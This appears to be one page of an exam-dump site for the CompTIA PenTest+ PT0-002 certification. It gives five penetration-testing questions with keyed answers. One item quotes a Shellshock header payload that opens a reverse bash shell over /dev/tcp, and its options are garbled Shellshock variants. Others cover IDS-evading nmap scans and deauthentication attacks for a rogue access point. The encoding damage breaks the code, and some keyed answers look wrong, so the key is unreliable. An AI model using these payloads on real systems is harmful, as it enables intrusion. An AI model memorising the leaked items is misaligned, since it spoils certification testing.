Amazon
Avaya
Checkpoint
Cisco®
CompTIA
CrowdStrike
EC-Council
EXIN
Fortinet
Google
ISC
ISC2
ITIL®
Juniper
Microsoft
MuleSoft
Okta
Oracle
Palo Alto Networks
Salesforce
All Vendors
  1. Home
  2. CompTIA
  3. PT0-002

CompTIA PT0-002 Exam (page: 11)
CompTIA PenTest+ Certification
Updated on: 01-Sep-2025

Viewing Page 11 of 105
PT0-002 PDF 520 Questions

A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.
Which of the following techniques would BEST accomplish this goal?

  1. RFID cloning
  2. RFID tagging
  3. Meta tagging
  4. Tag nesting

Answer(s): D



A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  1. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
  2. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
  3. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
  4. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€ ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

Answer(s): A



A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.
Which of the following are considered passive reconnaissance tools? (Choose two.)

  1. Wireshark
  2. Nessus
  3. Retina
  4. Burp Suite
  5. Shodan
  6. Nikto

Answer(s): A,E


Reference:

https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/



A penetration tester wants to scan a target network without being detected by the client's IDS.
Which of the following scans is MOST likely to avoid detection?

  1. nmap -P0 -T0 -sS 192.168.1.10
  2. nmap -sA -sV --host-timeout 60 192.168.1.10
  3. nmap -f --badsum 192.168.1.10
  4. nmap -A -n 192.168.1.10

Answer(s): C


Reference:

https://www.oreilly.com/library/view/network-security-assessment/9780596510305/ch04.html



A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.
Which of the following steps should the tester take NEXT?

  1. Send deauthentication frames to the stations.
  2. Perform jamming on all 2.4GHz and 5GHz channels.
  3. Set the malicious AP to broadcast within dynamic frequency selection channels.
  4. Modify the malicious AP configuration to not use a preshared key.

Answer(s): A



Viewing Page 11 of 105



Share your comments for CompTIA PT0-002 exam with other users:

SAJI 7/20/2023 2:51:00 AM

56 question correct answer a,b
Anonymous


Summer 10/4/2023 9:57:00 PM

looking forward to the real exam
Anonymous